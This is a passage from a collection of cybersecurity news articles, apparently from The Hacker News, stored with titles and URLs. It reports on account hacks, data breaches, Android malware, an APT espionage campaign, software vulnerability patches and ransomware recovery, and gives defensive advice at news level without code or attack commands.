According to the prosecutors, Atrach allegedly hacked into email accounts belonging to Gomez and one of her associates several times between June 2015 and February 2016, the Los Angeles County District Attorney's office said in a press release.
She then obtained images and other media stored there and shared them with her friends and posted them online.
Gomez, who has more than 138 million followers on Instagram, was the victim of a hacking attack in August 2017, when photographs of her ex-boyfriend Justin Bieber were posted to her Instagram account.
However, it is not immediately clear if those photos were also the subject of the criminal charges against Atrach.
According to LA Times, Atrach believed to have broken into Apple iCloud and Yahoo email accounts used by Gomez and her personal assistant, by using the publicly-available information to answer the singer's ""secret questions.""
She then reportedly stole digital information, including photos of Justin Bieber that were taken as Gomez and Bieber vacationed in Bora Bora in 2015, and made them online.
Atrach is scheduled to be arraigned in Los Angeles Superior Court by August 27. If convicted, Atrach could face up to nine years and eight months in prison.
Neither Gomez nor any of her representatives have made a comment on the case.
It seems like celebrities are not taking the security of their online accounts seriously, as anyone could find the answers to celebrities' security questions among hundreds of pieces of information about the celebrities readily available on the Internet.
In past, hackers managed to breach the iCloud accounts of a hundreds of singers and actresses, including Jennifer Lawrence, Kate Upton, Miley Cyrus, and Kim Kardashian, extract photos and videos and then post them online—the incident very well known the Fappening.
So, lesson learned—always choose strong and unique passwords for all your online accounts and enable two-factor authentication, if available, so that even if the hackers know your password, they can not get into your account.
Moreover, do not keep easy-to-guess answers to your security questions, use one that only you knows, and nobody else.
Since such hacks are usually conducted using social engineering tricks, you are advised to avoid clicking on any suspicious link or attachment you receive via an email or message and avoid providing your personal or financial information without verifying the source properly.
5 Places Where Hackers Are Stealthily Stealing Your Data In 2019,https://thehackernews.com/2019/10/hacking-data-breach-protection.html,"Skyrocketing data breaches bring incalculable losses to organizations and can cost cybersecurity executives their jobs.
Here we examine the top five places in 2019 where cybercriminals are stealing corporate and government data without ever getting noticed and then learn how to avoid falling victim to unscrupulous attackers.
1. Misconfigured Cloud Storage
48% of all corporate data is stored in the cloud compared to 35% three years ago, according to a 2019 Global Cloud Security Study by cybersecurity company Thales that surveyed over 3,000 professionals across the globe. Contrastingly, only 32% of the organizations believe that protecting data in the cloud is their own responsibility, counting on cloud and IaaS providers to safeguard the data. Worse, 51% of the organizations do not use encryption or tokenization in the cloud.
(ISC)² Cloud Security Report 2019 assets that 64% of cybersecurity professionals perceive data loss and leakage as the biggest risk associated with the cloud. Misuse of employee credentials and improper access controls are the top challenges for 42% of security professionals, while 34% struggle with compliance in the cloud, and 33% name lack of visibility into infrastructure security as their predominant concern.
Negligent and careless third-parties are, however, probably the most hazardous pitfall that remains largely underestimated and thus disregarded. In 2019, Facebook, Microsoft, and Toyota were mercilessly stigmatized by the media for losing millions of customer records due to third-party leaks or breaches.
Despite these alarming incidents, still few organizations have a well-thought, properly implemented, and continuously enforced third-party risk management program, most relying on paper-based questioners skipping practical verifications and continuous monitoring.
How to mitigate: train your team, implement an organization-wide cloud security policy, continuously run discovery of public cloud storage to maintain an up2date inventory of your cloud infrastructure.
2. Dark Web
Notorious Collection #1, revealed in 2019 by security expert Troy Hunt, is a set of email addresses and plaintext passwords totaling 2,692,818,238 rows. Anyone can anonymously purchase this data for Bitcoins without leaving a trace. Being one of the largest publicly known databases of stolen credentials, it is a mere slice of compromised data available for sale on Dark Web. Many organizations are hacked every day without being aware of this due to the complexity of the attacks or simple negligence, lack of resources or skills.
Targeted password re-use attacks and spear phishing are simple to launch and do not require expensive 0day exploits. Although trivial at first glance, they may be piercingly efficient. Most organizations do not have a consistent password policy across their corporate resources, deploying SSO only to their central infrastructure.
Secondary and auxiliary systems live their own lives, commonly with a poor or even missing password policy but with access to trade secrets and intellectual property. Given the multitude of such portals and resources, attackers meticulously try stolen credentials and eventually get what they seek.
Importantly, such attacks are often technically undetectable due to insufficient monitoring or simply because they do not trigger usual anomalies just letting users in. Experienced hacking groups will carefully profile their victims before the attack to login from the same ISP sub-network and during the same hours outsmarting even the AI-enabled IDS systems underpinned by shrewd security analysts.
How to mitigate: ensure digital assets visibility, implement holistic password policy and incident response plan, continuously monitor Dark Web and other resources for leaks and incidents.
3. Abandoned and Unprotected Websites
According to 2019 research by a web security company ImmuniWeb, 97 out of 100 the world's largest banks have vulnerable websites and web applications. A wide spectrum of problems is attributed to uncontrolled usage of Open Source Software, outdated frameworks, and JS libraries, some of which contained exploitable vulnerabilities publicly known since 2011.
The same report revealed that 25% of e-banking applications were not even protected with a Web Application Firewall (WAF). Eventually, 85% of applications failed GDPR compliance tests, 49% did not pass the PCI DSS test.
In spite of the rise of Attack Surface Management (ASM) solutions, the majority of businesses incrementally struggle with the growing complexity and fluctuating intricacy of their external attack surfaces. Web applications dominate the list of abandoned or unknown assets being left by careless or overloaded developers.
Demo and test releases rapidly proliferate across an organization, sporadically being connected to production databases with sensitive data. The next releases rapidly go live, while the previous ones remain in the wild for months. Understaffed security teams routinely have no time to track such rogue applications, relying on the security policies that half of the software engineers have never read.
Even properly deployed web applications may be a time bomb if left unattended. Both Open Source and proprietary software make a buzz in Bugtraq with remarkable frequency bringing new and predominately easily-exploitable security flaws. With some exceptions, vendors are sluggish to release security patches compared to the speed of mass-hacking campaigns.
Most popular CMS, such as WordPress or Drupal, are comparatively safe in their default installations, but the myriad of third-party plugins, themes, and extensions annihilate their security.
How to mitigate: start with a free website security test for all your external-facing websites and continue with in-depth web penetration testing for the most critical web application and APIs.
4. Mobile Applications' Backends
Modern businesses now generously invest in mobile application security, leveraging secure coding standards built into DevSecOps, SAST/DAST/IAST testing, and RASP protection enhanced with Vulnerability Correlation solutions. Sadly, most of these solutions tackle only the visible tip of the iceberg, leaving mobile application backend untested and unprotected.
While most of the APIs used by the mobile application send or receive sensitive data, including confidential information, their privacy and security are widely forgotten or deprioritized, leading to unpardonable consequences.
Likewise, large organizations commonly forget that previous versions of their mobile apps can be easily downloaded from the Internet and reverse-engineered. Such legacy applications are a true Klondike for hackers searching for abandoned and vulnerable APIs commonly still capable of providing access to an organization's crown jewels in an uncontrolled manner.
Eventually, a great wealth of attacks become possible, from primitive but highly efficient brute-forcing to sophisticated authentication and authorization bypasses used for data scraping and theft. Usually, the most dangerous attacks, including SQL injections and RCEs, reside on the mobile backend side. Being unprotected even by a WAF, they are low-hanging fruit for pragmatic attackers.
How to mitigate: build holistic API inventory, implement software testing policy, run a free mobile app security test on all your mobile apps and backends, conduct mobile penetration testing for critical ones.
5. Public Code Repositories
Agile CI/CD practices are a great business enabler; however, if inadequately implemented, they swiftly morph into a disaster. Within this context, public code repositories are often the weakest link undermining organizational cybersecurity efforts.
A recent example comes from the banking giant Scotiabank that reportedly stored highly sensitive data in publicly open and accessible GitHub repositories, exposing its internal source code, login credentials, and confidential access keys.
Third-party software developers considerably exacerbate the situation in an attempt to provide the most competitive quote to unwitting and somewhat naïve customers. Cheap software is obviously not without substantial drawbacks, and poor security tops them.
While few organizations manage to keep control over the software code quality and security by conducting automated scanning and a manual code review, virtually none are capable of monitoring how the source code is being stored and protected while the software is being developed and especially afterward.
Human mistakes unsurprisingly predominate the space. Even exemplary organizations with mature and prof-tested security policies awkwardly slip because of human factors. Tough deadlines dictated by economic realities lead to overburdened and exhausted programmers who innocently forget to set a proper attribute on a newly created repository letting the troubles in.
How to mitigate: implement a policy addressing code storage and access management, enforce it internally and for third-parties, continuously run public code repositories monitoring for leaks.
Following this mitigation advice may save you countless sleepless nights and many millions for your organization. And lastly, do share information about Attack Surface Management (ASM) with your industry peers to enhance their security awareness and cybersecurity resilience.
phpMyAdmin Releases Critical Software Update — Patch Your Sites Now!,https://thehackernews.com/2018/12/phpmyadmin-security-update.html,"Developers of phpMyAdmin, one of the most popular and widely used MySQL database management systems, today released an updated version 4.8.4 of its software to patch several important vulnerabilities that could eventually allow remote attackers to take control of the affected web servers.
The phpMyAdmin project last Sunday gave an early heads-up about the latest security update through its blog, probably the first time, as an experiment to find if pre-announcements can help website admins, hosting providers and package managers better prepare for the security release.
""We are inspired by the workflow of other projects (such as Mediawiki and others) which often announce any security release in advance to allow package maintainers and hosting providers to prepare. We are experimenting to see if such a workflow is suitable for our project,"" phpMyAdmin release manager Isaac Bennetch told The Hacker News.
phpMyAdmin is a free, open-source administration tool for managing MySQL databases using a simple graphical interface over the web-browser.
Almost every web hosting service pre-installs phpMyAdmin with their control panels to help webmasters easily manage their databases for websites, including WordPress, Joomla, and many other content management platforms.
Besides many bug fixes, there are primarily three critical security vulnerabilities that affect phpMyAdmin versions before release 4.8.4, phpMyAdmin revealed in its latest advisory.
New phpMyAdmin Vulnerabilities
Details of three newly discovered phpMyAdmin vulnerabilities are as described below:
1.) Local file inclusion (CVE-2018-19968) — phpMyAdmin versions from at least 4.0 through 4.8.3 includes a local file inclusion flaw that could allow a remote attacker to read sensitive contents from local files on the server through its transformation feature.
""The attacker must have access to the phpMyAdmin Configuration Storage tables, although these can easily be created in any database to which the attacker has access. An attacker must have valid credentials to log in to phpMyAdmin; this vulnerability does not allow an attacker to circumvent the login system.""
2.) Cross-Site Request Forgery (CSRF)/XSRF (CVE-2018-19969) — phpMyAdmin versions 4.7.0 through 4.7.6 and 4.8.0 through 4.8.3 includes a CSRF/XSRF flaw, which if exploited, could allow attackers to ""perform harmful SQL operations such as renaming databases, creating new tables/routines, deleting designer pages, adding/deleting users, updating user passwords, killing SQL processes"" just by convincing victims into opening specially crafted links.
3.) Cross-site scripting (XSS) (CVE-2018-19970) — The software also includes a cross-site scripting vulnerability in its navigation tree, which impacts versions from at least 4.0 through 4.8.3, using which an attacker can inject malicious code into the dashboard through a specially-crafted database/table name.
To address all above listed security vulnerabilities, phpMyAdmin developers today released the latest version 4.8.4, as well as separate patches for some previous versions.
Website administrators and hosting providers are highly recommended to install latest update or patches immediately.
"Android Malware as Beware of Chinese called ""The Roar of the Pharaoh""",https://thehackernews.com/2012/04/android-malware-as-beware-of-chinese.html,"Android Malware as Chinese game ""The Roar of the Pharaoh""
Security researchers have spotted a bogus Chinese game, that's actually a trojan horse gathering sensitive information from infected devices, next to sending premium-rate SMS messages. It is Chinese game that is original with its rights but on Android it is a fake application that inherits malware Trojan to steal important information from your cell phone.
The malware works after an unknowing Android handset owner installs the app, allowing the malware to collect data, such as phone number, IMEI number, phone model, screen size and platform, and recording the OS version and platform used for sending via SMS to the Trojan's authors.
But it also noted the new Trojan is unusual as it does not ask for any specific permissions during installation, which is often an indicator an application is up to no good.It added the malware masquerades as a service called ""GameUpdateService"" a very plausible name for a legitimate app if one were to check the processes running on his or her device.
The malicious application is currently detected as Andr/Stiniter-A. It said the mobile phone companies provide the payment processing and the bad guys have their money and are long gone before the victim ever receives the phone bill with the fraudulent charges.
Michael Sutton, vice president of security research at cloud-based security provider Zscaler, said the fake ""The Roar of the Pharaoh"" app for Android reflects the shift of malware authors to target the Android platform, whether smartphones or tablets. Fake game apps that are really Trojans are increasing and ""this is a typical scam for Android now,"" he says.
Other Android News:
DKFBootKit - First Android BootKit Malware
Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities
This Asia-Pacific Cyber Espionage Campaign Went Undetected for 5 Years,https://thehackernews.com/2020/05/asia-pacific-cyber-espionage.html,"An advanced group of Chinese hackers has recently been spotted to be behind a sustained cyber espionage campaign targeting government entities in Australia, Indonesia, Philippines, Vietnam, Thailand, Myanmar, and Brunei—which went undetected for at least five years and is still an ongoing threat.
The group, named 'Naikon APT,' once known as one of the most active APTs in Asia until 2015, carried out a string of cyberattacks in the Asia-Pacific (APAC) region in search of geopolitical intelligence.
According to the latest investigation report Check Point researchers shared with The Hacker News, the Naikon APT group had not gone silent for the last 5 years, as initially suspected; instead, it was using a new backdoor, called ""Aria-body,"" to operate stealthily.
""Given the characteristics of the victims and capabilities presented by the group, it is evident that the group's purpose is to gather intelligence and spy on the countries whose governments it has targeted,"" the researchers said.
The backdoor serves a dual purpose in that the threat actor, besides using it to take control of the internal networks of the targeted organizations, is also mounting attacks from an already breached company to infect another.
""This includes not only locating and collecting specific documents from infected computers and networks within government departments, but also extracting removable data drives, taking screenshots and keylogging, and of course, harvesting the stolen data for espionage.""
A Geo-Political Intelligence Campaign
First documented in 2015, the Naikon APT group uses crafted email lures as an initial attack vector against top-level government agencies and civil and military organizations, which, when opened, installed spyware that exfiltrated sensitive documents to remote command-and-control (C2) servers.
Although no new signs of activity have been reported since then, Check Point's latest research casts its operations in a fresh light.
""Naikon attempted to attack one of our customers by impersonating a foreign government – that's when they came back onto our radar after a five-year absence, and we decided to investigate further,"" Lotem Finkelsteen, manager of threat intelligence at Check Point, said.
Not only were multiple infection chains employed to deliver the Aria-body backdoor, but the malicious emails also contained an RTF file (named ""The Indians Way.doc"") that was infected with an exploit builder called RoyalBlood, which dropped a loader (intel.wll) in the system's Microsoft Word startup folder (""%APPDATA%\Microsoft\Word\STARTUP"").
RoyalBlood is an RTF weaponizer shared mostly among Chinese threat actors. It's worth noting that a similar modus operandi has been linked to a campaign against Mongolian government agencies, called Vicious Panda, that was found exploiting the ongoing coronavirus outbreak to plant malware via social engineering tricks.
In a separate infection mechanism, archive files were packaged with a legitimate executable (such as Outlook and Avast Proxy) and a malicious library to drop the loader on the target system.
Regardless of the method to gain an initial foothold, the loader then established a connection with a C2 server to download the next-stage Aria-body backdoor payload.
""After getting the C&C domain, the loader contacts it to download the next and final stage of the infection chain,"" the researchers noted. ""Although it sounds simple, the attackers operate the C&C server in a limited daily window, going online only for a few hours each day, making it harder to gain access to the advanced parts of the infection chain.""
The Aria-body RAT, named so based on the name ""aria-body-dllX86.dll"" given by the malware authors, has all the features you'd expect from a typical backdoor: create and delete files and directories, take screenshots, search for files, gather file metadata, collect system and location information, among others.
Some recent variations of Aria-body also come equipped with capabilities to capture keystrokes, and even load other extensions, per researchers, suggesting the backdoor is under active development.
Aside from exfiltrating all the gathered data to the C2 server, the backdoor listens for any additional commands to be executed.
Further analysis of the C2 infrastructure found that several domains were used for long stretches of time, with the same IP address reused with more than one domain.
Taking their evasion tactics to the next level, the adversary compromised and used servers within the infected ministries as C2 servers to launch attacks, and relay and route the stolen data, rather than risk detection when accessing the remote servers.
Ties to Naikon APT
Check Point said it attributed the campaign to the Naikon APT based on code similarities in Aria-body and the espionage tool detailed by Kaspersky (called ""XSControl"") in 2015, as well as in the use of C2 domains (mopo3[.]net) that resolve to the same IP address as the domains mentioned by the latter (myanmartech.vicp[.]net).
""While the Naikon APT group has kept under the radar for the past 5 years, it appears that they have not been idle,"" Check Point concluded. ""In fact, quite the opposite. By utilizing new server infrastructure, ever-changing loader variants, in-memory fileless loading, as well as a new backdoor — the Naikon APT group was able to prevent analysts from tracing their activity back to them.""
Firmware vulnerability allows man-in-the-middle attack using SD Memory cards,https://thehackernews.com/2014/01/firmware-vulnerability-allows-man-in.html,"How is it possible to exploit SD Card, USB stick and other mobile devices for hacking? Another interesting hack was presented at the Chaos Computer Congress (30C3), in Hamburg, Germany.
The researchers demonstrated how it is possible to hack the microcontroller inside every SD and MicroSD flash cards that allow arbitrary code execution and can be used to perform a man in the middle attack.
The Hardware Hackers Andrew ""bunnie"" Huang and Sean ""xobs"" described the exploitation method on their blog post,""it also enables the possibility for hardware enthusiasts to gain access to a very cheap and ubiquitous source of microcontrollers.""
It seems that to reduce SD cards price and increase their storage capability, engineers have to consider a form of internal entropy that could affect data integrity on every Flash drive. Almost every NAND flash memory is affected by defects and presents problems like electron leakage between adjacent cells.
""Flash memory is really cheap. So cheap, in fact, that it's too good to be true. In reality, all flash memory is riddled with defects — without exception. The illusion of a contiguous, reliable storage media is crafted through sophisticated error correction and bad block management functions. This is the result of a constant arms race between the engineers and mother nature; with every fabrication process shrinks, memory becomes cheaper but more unreliable. Likewise, with every generation, the engineers come up with more sophisticated and complicated algorithms to compensate for mother nature's propensity for entropy and randomness at the atomic scale."" wrote Huang.
Manufacturers have a sophisticated software that can detect hardware issues, such as bad sectors, and correct them through firmware. Hackers could hack into these flash-based storage devices using firmware vulnerability, allowing them to install malware.
The firmware on the SD cards can be updated, but according the Huang revelations most manufacturers leave this update functionality unsecured.
During the presentation, they reverse-engineered the instruction set of a particular microcontroller to inspect firmware loading mechanism.
The attackers suitably modifying the firmware could hack any device that uses the compromised SD card (e.g. A mobile device, Wi-Fi equipped camera), the flash memory will appear to be operating normally while hacking the hoisting equipment.
The SD card could make a copy of the contents in a hidden memory area or it could run malicious code while idle avoiding detection mechanisms.
When we speak about USB hacking or SD Card is hacking we must consider that we are approaching the hacking on a large-scale due the wide diffusion of these components. Microcontrollers cost as little as 15¢ each in quantity, they are everywhere and every device that use them could be hacked.
Another consideration that must be done is that Governments and high profile hackers could be very interested in this type of attack for both cyber espionage and sabotage, arrange a countermeasure against those types of threat it is very hard.
A curiosity for the ""hackers inside""... These cards could be reprogrammed to become Arduino open source microcontroller and memory systems.
""An Arduino, with its 8-bit 16 MHz microcontroller, will set you back around $20. A MicroSD card with several gigabytes of memory and a microcontroller with several times the performance could be purchased for a fraction of the price,"" he writes.
So, in short, destroy your SD cards if you have any dirty info on them and keep your eyes peeled for ultra-small, ultra-fast Arduino hacks.
Look closely at the presentation... and distrustful of SD cards from now on.
THOR : Another P2P Botnet in development with extra stealth features,https://thehackernews.com/2012/03/thor-another-p2p-botnet-in-development.html,"THOR : Another P2P Botnet in development with extra stealth features
The research community is now focusing on the integration of peer-to-peer (P2P) concepts as incremental improvements to distributed malicious software networks (now generically referred to as botnets). Because ""botnets"" can be used for illicit financial gain,they have become quite popular in recent Internet attacks.
A ""botnet"" is a network of computers that are compromised and controlled by an attacker. Each computer is infected witha malicious program called a ""bot"", which actively communicates with other bots in the botnet or with several ""botcontrollers"" to receive commands from the botnet owner. Attackers maintain complete control of their botnets, andcan conduct Distributed Denial-of-Service (DDoS) attacks,email spamming, keylogging, abusing online advertisements, spreading new malware, etc.
However, the first botnets that use peer-to-peer (P2P) networks for remote control of the compromised machines appeared in the wild recently. This new bot has a different code base, it uses the same spreading strategy and also seems to maintain a multi-relay (or peer-to-peer) infrastructure just like its predecessor.
Thor is a decentralised P2P botnet , Coded in C / C++ & Developed by ""TheGrimReap3r"" that has been in development for some time now and is almost ready to go out on sale.The botnet itself has no central command point, so it will be very difficult to shut down, also, very difficult to track where commands are coming from, because all the nodes pass them on.
Thor uses DLL injection, IAT hooking, ring3 rootkit amongst other things to hide. One more interesting Feature that It have it's own module system so you can write your own modules with our easy API system. It include peer to peer communication uses 256-AES encryption with random key generation at each startup.
Thor works on Win 2000+, Win XP SP0/SP1/SP2/SP3, Win Vista SP0/SP1/SP2, Win 7 SP0/SP1 and Support x86 and x64 systems.
The Developers of Thor going to sale this Botnet openly in underground market and various hacking forums at $8000, the package without modules and the expected modules that anyone can buy will be: advanced botkiller, DDoS, formgrabber, keylogger/password stealer and mass mailer.
Facebook hack exposes contact Information of 6 Million Users,https://thehackernews.com/2013/06/facebook-hack-exposes-contact.html,"Facebook is alerting its users about a security breach due to a technical glitch, that may have inadvertently exposed the email addresses and telephone numbers of roughly 6 million users.
""We recently received a report to our White Hat program regarding a bug that may have allowed some of a person's contact information (email or phone number) to be accessed by people who either had some contact information about that person or some connection to them,"" Facebook said in its announcement.
The problem stemmed from a tool that allows users to upload their contact lists or address books to Facebook so that the social network can serve up friend recommendations or invite people to join Facebook.
""Because of the bug, some of the information used to make friend recommendations and reduce the number of invitations we send was inadvertently stored in association with people's contact information as part of their account on Facebook,""
As a result, if a person went to download an archive of their Facebook account through or Download Your Information (DYI) tool, they may have been provided with additional email addresses or telephone numbers for their contacts or people with whom they have some connection.
After report, Facebook immediately disabled that DYI tool in order to fix the problem and then turned the DYI back on the next day, after addressing the issue.
Facebook said so far it has no evidence to believe the bug was exploited and has not received complaints from users.
The breach follows recent disclosures that several consumer Internet companies turned over troves of user data to a large-scale electronic surveillance program run by U.S. intelligence.
Critical RCE Flaws Affect VMware ESXi and vSphere Client — Patch Now,https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html,"VMware has addressed multiple critical remote code execution (RCE) vulnerabilities in VMware ESXi and vSphere Client virtual infrastructure management platform that may allow attackers to execute arbitrary commands and take control of affected systems.
""A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,"" the company said in its advisory.
The vulnerability, tracked as CVE-2021-21972, has a CVSS score of 9.8 out of a maximum of 10, making it critical in severity.
""In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781),"" said Positive Technologies' Mikhail Klyuchnikov, who discovered and reported the flaw to VMware.
""The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server.""
With this access in place, the attacker can then successfully move through the corporate network and gain access to the data stored in the vulnerable system, such as information about virtual machines and system users, Klyuchnikov noted.
Separately, a second vulnerability (CVE-2021-21973, CVSS score 5.3) allows unauthorized users to send POST requests, permitting an adversary to mount further attacks, including the ability to scan the company's internal network and retrieve specifics about the open ports of various services.
The information disclosure issue, according to VMware, stems from an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in the vCenter Server plugin.
VMware has also provided workarounds to remediate CVE-2021-21972 and CVE-2021-21973 temporarily until the updates can be deployed. Detailed steps can be found here.
It's worth noting that VMware rectified a command injection vulnerability in its vSphere Replication product (CVE-2021-21976, CVSS score 7.2) earlier this month that could grant a bad actor with administrative privileges to execute shell commands and achieve RCE.
Lastly, VMware also resolved a heap-overflow bug (CVE-2021-21974, CVSS score 8.8) in ESXi's service location protocol (SLP), potentially allowing an attacker on the same network to send malicious SLP requests to an ESXi device and take control of it.
OpenSLP provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.
The latest fix for ESXi OpenSLP comes on the heels of a similar patch (CVE-2020-3992) last November that could be leveraged to trigger a use-after-free in the OpenSLP service, leading to remote code execution.
Not long after, reports of active exploitation attempts emerged in the wild, with ransomware gangs abusing the vulnerability to take over unpatched virtual machines deployed in enterprise environments and encrypt their virtual hard drives.
It's highly recommended that users install the updates to eliminate the risk associated with the flaws, in addition to ""removing vCenter Server interfaces from the perimeter of organizations, if they are there, and allocate them to a separate VLAN with a limited access list in the internal network.""
New Android Malware Hijacks Router DNS from Smartphone,https://thehackernews.com/2016/12/android-dns-malware.html,"Another day, another creepy malware for Android users!
Security Researchers have uncovered a new Android malware targeting your devices, but this time instead of attacking the device directly, the malware takes control over the WiFi router to which your device is connected to and then hijacks the web traffic passing through it.
Dubbed ""Switcher,"" the new Android malware, discovered by researchers at Kaspersky Lab, hacks the wireless routers and changes their DNS settings to redirect traffic to malicious websites.
Over a week ago, Proofpoint researchers discovered similar attack targeting PCs, but instead of infecting the target's machines, the Stegano exploit kit takes control over the local WiFi routers the infected device is connected to.
Switcher Malware carries out Brute-Force attack against Routers
Hackers are currently distributing the Switcher trojan by disguising itself as an Android app for the Chinese search engine Baidu (com.baidu.com), and as a Chinese app for sharing public and private Wi-Fi network details (com.snda.wifilocating).
Once victim installs one of these malicious apps, the Switcher malware attempts to log in to the WiFi router the victim's Android device is connected to by carrying out a brute-force attack on the router's admin web interface with a set of a predefined dictionary (list) of usernames and passwords.
""With the help of JavaScript [Switcher] tries to login using different combinations of logins and passwords,"" mobile security expert Nikita Buchka of Kaspersky Lab says in a blog post published today.
""Judging by the hard coded names of input fields and the structures of the HTML documents that the trojan tries to access, the JavaScript code used will work only on web interfaces of TP-LINK Wi-Fi routers.""
Switcher Malware Infects Routers via DNS Hijacking
Once accessed web administration interface, the Switcher trojan replaces the router's primary and secondary DNS servers with IP addresses pointing to malicious DNS servers controlled by the attackers.
Researchers said Switcher had used three different IP addresses –, and – as the primary DNS record, one is the default one while the other two are set for specific internet service providers.
Due to change in router's DNS settings, all the traffic gets redirected to malicious websites hosted on attackers own servers, instead of the legitimate site the victim is trying to access.
""The Trojan targets the entire network, exposing all its users, whether individuals or businesses, to a wide range of attacks – from phishing to secondary infection,"" the post reads.
""A successful attack can be hard to detect and even harder to shift: the new settings can survive a router reboot, and even if the rogue DNS is disabled, the secondary DNS server is on hand to carry on.""
Researchers were able to access the attacker's command and control servers and found that the Switcher malware Trojan has compromised almost 1,300 routers, mainly in China and hijacked traffic within those networks.
The Bottom Line
Android users are required to download applications only from official Google's Play Store.
While downloading apps from third parties do not always end up with malware or viruses, it certainly ups the risk. So, it is the best way to avoid any malware compromising your device and the networks it accesses.
You can also go to Settings → Security and make sure ""Unknown sources"" option is turned off.
Moreover, Android users should also change their router's default login and passwords so that nasty malware like Switcher or Mirai, can not compromise their routers using a brute-force attack.
Yahoo Confirms 500 Million Accounts Were Hacked by 'State Sponsored' Hackers,https://thehackernews.com/2016/09/yahoo-data-breach.html,"500 million accounts — that's half a Billion users!
That's how many Yahoo accounts were compromised in a massive data breach dating back to 2014 by what was believed to be a ""state sponsored"" hacking group.
Over a month ago, a hacker was found to be selling login information related to 200 million Yahoo accounts on the Dark Web, although Yahoo acknowledged that the breach was much worse than initially expected.
""A recent investigation by Yahoo! Inc. has confirmed that a copy of certain user account information was stolen from the company's network in late 2014 by what it believes is a state-sponsored actor,"" reads the statement.
Yahoo is investigating the breach with law enforcement agency and currently believes that users' names, email addresses, dates of birth, phone numbers, passwords, and in some cases, encrypted and unencrypted security questions-answers were stolen from millions of Yahoo users.
However, the company does not believe the stolen information includes credit card information or any bank details of the affected users.
Yahoo has been criticized for its slow response to the data breach, but it is now in the process of notifying affected customers via emails and asking them to change their passwords, as well as security questions.
At this moment Yahoo did not provide any evidence on why it believed the breach was work of state-sponsored hackers.
Despite millions of people affected by the breach, the biggest victim here seems to be Yahoo itself.
The data breach reports come just as the company is trying to negotiate a deal to sell itself to Verizon for $4.8 Billion. So, if the breach reports negatively impact its share price, even for the time being, it could cost the company and its shareholders a slice of its buyout value.
Over past few months, a large number of data breaches have been reported to plague companies like LinkedIn, MySpace, Tumblr, and VK.com as hackers put up for sale massive data dumps of user credentials stolen earlier in the decade.
Change your Password and Use Password Manager
Needless to say, users should immediately change their Yahoo account password. The company will also be prompting anyone who hasn't changed their password since 2014 to do so now.
""Additionally, Yahoo asks users to consider using Yahoo Account Key, a simple authentication tool that eliminates the need to use a password altogether,"" Yahoo suggests.
Also make sure that you also change your passwords on other online accounts if they use the same password, and enable two-factor authentication for online accounts immediately.
And once again, a strong recommendation: Don't reuse passwords.
If you are unable to remember different passwords for each site, you can adopt a good password manager that allows you to create complex passwords for various sites as well as remember them for you.
We have recently listed some best password managers that could help you understand the importance of password managers and help you choose a suitable one, according to your requirement.
NSA Accidentally Took Down Syria's Internet While Infiltrating Central Router System,https://thehackernews.com/2014/08/nsa-accidentally-took-down-syrias.html,"Before proceeding towards the story, let's first go back two years to figure out what was wrong when Syria was completely blackout - sudden disconnect from the Internet - which lasted for the period of three days in 2012. Is that the Syrian government behind the blackout ?
The outage took place during a period of intense fighting in the country's still-ongoing civil war. So, it was supposed that may it be the government's fault. But, the Syrian Minister of Information said that the government didn't disable the Internet, instead the outage was caused by a cable being cut by some terrorists. When investigated, it was unlikely to be the case.
So, Who was actually behind Syria Blackout ? NSA? Yup! It was the same NSA who was behind a number of major happenings.
National Security Agency (NSA) – the God-like powered agency that had ruled over the privacy of the entire world from countries to individuals, the one with master access to read anyone's data, intruded into large fiber networks, and can target anyone, at any time and at any place.
The new revelation from the global surveillance whistleblower Edward Snowden remove the mask from one more Agency's secret – a 2012 incident that took Syria's Internet offline was caused by a blunder made by none other than the National Security Agency.
In an interview with Wired magazine's well-known NSA journalist James Bamford published today, Snowden said that the elite hacking unit in the NSA, very well known as Tailored Access Operations (TAO), accidentally took most of Syria off the Internet while attempting to infiltrate the country's traffic.
The TAO unit had allegedly been attempting to install malware by exploiting a vulnerability in the router of Syria's main Internet service provider that would have allowed the agency to redirect traffic from the central router through systems tapped by NSA's Turmoil packet capture system and the Xkeyscore packet processing system.
This would have given the agency access to enclosures in e-mails that would otherwise not have been possible by its wider Internet surveillance program.
Instead, the TAO's hackers successfully executed it, the plan backfired as the unit accidentally rendered the router - a very equipment it was trying to tap, causing Syria's internet connection to go dark. Snowden described the incident as an ""oh shit"" moment at the Tailored Access Operations center, where NSA feared of the moment if the Syrian government would discover what they had done.
The incident was really ironic - where other parts of the U.S. government were trying to keep Syria connected, the TAO unit was trying to repair the router and cover its tracks, to no avail.
""Fortunately for the NSA, the Syrians were apparently more focused on restoring the nation's Internet than on tracking down the cause of the outage,"" Bamford wrote. Snowden told him that someone joked, ""If we get caught, we can always point the finger at Israel.""
It had been largely assumed that the outage had been caused by one of the opposing parties within Syria, be it the government itself or rebels. It was thought because since then, a number of times Syria's internet has gone dark, so it isn't wrong to continue assuming the same when outages occur. While the Syrian government blamed dissenting ""terrorists"" for the outage caused.
This recent Snowden's disclosure describes an embarrassing part of US intelligence agency though, but at the same time, the disclosure also made the list of culprits that people will consider when similar incidents occur in the future.
5 Critical Steps to Recover From a Ransomware Attack,https://thehackernews.com/2021/06/5-critical-steps-to-recovering-from.html,"Hackers are increasingly using ransomware as an effective tool to disrupt businesses and fund malicious activities.
A recent analysis by cybersecurity company Group-IB revealed ransomware attacks doubled in 2020, while Cybersecurity Ventures predicts that a ransomware attack will occur every 11 seconds in 2021.
Businesses must prepare for the possibility of a ransomware attack affecting their data, services, and business continuity. What steps are involved in recovering from a ransomware attack?
Isolate and shutdown critical systems
Enact your business continuity plan
Report the cyberattack
Restore from backup
Remediate, patch, and monitor
Isolate and shutdown critical systems
The first important step is to isolate and shut down business-critical systems. There is a chance the ransomware has not affected all accessible data and systems. Shutting down and isolating both infected systems and healthy systems helps contain malicious code.
From the first evidence of ransomware on the network, containment should be a priority. Containment and isolation can include isolating systems from a network perspective or powering them down altogether.
Enact your business continuity plan
The business continuity plan and its disaster recovery component are essential to maintaining some level of business operations.
